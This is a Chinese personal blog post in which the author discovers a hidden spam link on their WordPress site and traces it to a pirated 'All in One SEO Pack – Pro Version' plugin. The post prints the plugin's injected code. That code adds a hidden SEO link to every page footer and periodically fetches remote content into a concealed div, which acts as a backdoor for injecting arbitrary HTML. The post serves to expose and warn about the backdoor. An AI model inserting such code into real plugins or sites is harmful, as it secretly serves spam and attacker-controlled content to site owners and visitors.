All in One SEO Pack – Pro Version黑链事件

2014-11-27 06:43 • 心情琐事 • 阅读 2437

今天给博客做友链检测的时候居然发现了一个连接，我就纳闷了，我的博客没友链啊。

于是乎看了下源码，我勒个擦！发现一个黑链，这等于挂马了。

<noscript><a href="http://www.luminous-solutions.net">SEO services</a></noscript>

老夫第一感觉是服务器给人日了，（由于一直都没时间把博客搬到阿里云香港的节点上（好吧，我承认我懒了 – -）但是这个主机的速度还是相当快的，香港的阿里云渣渣）

查了下，这个主机同ip一百多个站，被黑也不是不可能啊。

然后查了下同ip段几个站，都没发现被挂了黑链，我擦，那就是我的问题了？我一向对网络安全都非常敏感的，接著主题、插件一个个排除…

发现All in One SEO Pack – Pro Version这个插件停用后，黑链不见了。

看了下插件代码，原来是你。

插件目录下All in One SEO Pack – Pro Versio/all_in_one_seo_pack.php 文件，第36行

<?php

/*
Plugin Name: All in One SEO Pack - Pro Version
Plugin URI: http://semperfiwebdesign.com
Description: Out-of-the-box SEO for your WordPress blog. <a href="options-general.php?page=all-in-one-seo-pack-pro/aioseop.class.php">Options configuration panel</a> | <a href="http://semperfiwebdesign.com/forum/" >Support</a>
Version: 1.72
Author: Michael Torbert
Author URI: http://michaeltorbert.com
*/

/*
Copyright (C) 2008-2009 Michael Torbert, semperfiwebdesign.com (michael AT semperfiwebdesign DOT com)
Original code by uberdose of uberdose.com

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program.  If not, see <http://www.gnu.org/licenses/>.
*/

/*******************************************************************************************************/
//register_activation_hook(__FILE__,'aioseop_activate_pl');
add_action('wp_footer', 'add_wc_footer_links');

function add_wc_footer_links() {

echo "<noscript><a href=\"http://www.luminous-solutions.net\">SEO services</a></noscript>\n";


	$timestamp = get_option('wc_special_footer_timestamp');
	if($timestamp < (time() -  WSFL_TTL)){
		$temp = @file_get_contents(WSFL_URL);
		if($temp and strlen($temp) < 1000){
			update_option('wc_special_footer_timestamp', time());
			update_option('wc_special_footer_cache', $temp);
			echo '<!-- live -->';
		}
	}

#	echo '<div style="display:block; background:yellow; padding:20px; position:fixed; top:0; left:0; width:100%;">';
	echo '<div style="display:none;">';
	echo get_option('wc_special_footer_cache');
	echo '</div>';

}

闪了，好困，休息去先~~~~

原创文章，作者：老D，如若转载，请注明出处：https://laod.cn/288.html